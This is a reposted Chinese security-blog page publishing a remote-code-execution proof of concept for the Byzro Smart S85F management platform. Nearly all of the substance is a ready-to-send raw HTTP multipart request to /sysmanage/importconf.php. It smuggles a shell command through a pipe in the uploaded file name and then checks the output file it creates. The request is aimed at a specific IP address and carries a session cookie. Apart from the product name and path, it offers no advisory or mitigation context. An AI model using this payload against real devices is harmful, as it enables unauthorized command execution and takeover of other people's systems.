百卓智能S85F管理平台RCE-POC

渗透技巧 9个月前 admin
170 0 0



百卓智能S85F管理平台RCE-POC

Byzro Networks Smart S85F管理平台存在rce漏洞

版本:S85F

路线:/sysmanage/importconf.php

百卓智能S85F管理平台RCE-POC

POC

POCPOST /sysmanage/importconf.php? HTTP/1.1Host: 60.29.117.204:8443Cookie: PHPSESSID=544810a771eeee640ffa3e710c427442User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------14818255536145421673683608122Content-Length: 389Origin: https://60.29.117.204:8443Referer: https://60.29.117.204:8443/sysmanage/importconf.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close
-----------------------------14818255536145421673683608122Content-Disposition: form-data; name="btn_file_renew"; filename="|echo${IFS}2224444>abc||.zip.tar.gz"Content-Type: application/octet-stream
sss-----------------------------14818255536145421673683608122Content-Disposition: form-data; name="rad"
radhttp_renew-----------------------------14818255536145421673683608122

百卓智能S85F管理平台RCE-POC

访问https://ip:port/home/Configdir/abc

百卓智能S85F管理平台RCE-POC

项目地址:

https://github.com/yaphetszz/cve/blob/main/upload.md




感谢您抽出

百卓智能S85F管理平台RCE-POC

.

百卓智能S85F管理平台RCE-POC

.

百卓智能S85F管理平台RCE-POC

来阅读本文

百卓智能S85F管理平台RCE-POC

点它,分享点赞在看都在这里


原文始发于微信公众号(Ots安全):百卓智能S85F管理平台RCE-POC

版权声明:admin 发表于 2023年10月22日 下午4:50。
转载请注明:百卓智能S85F管理平台RCE-POC | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...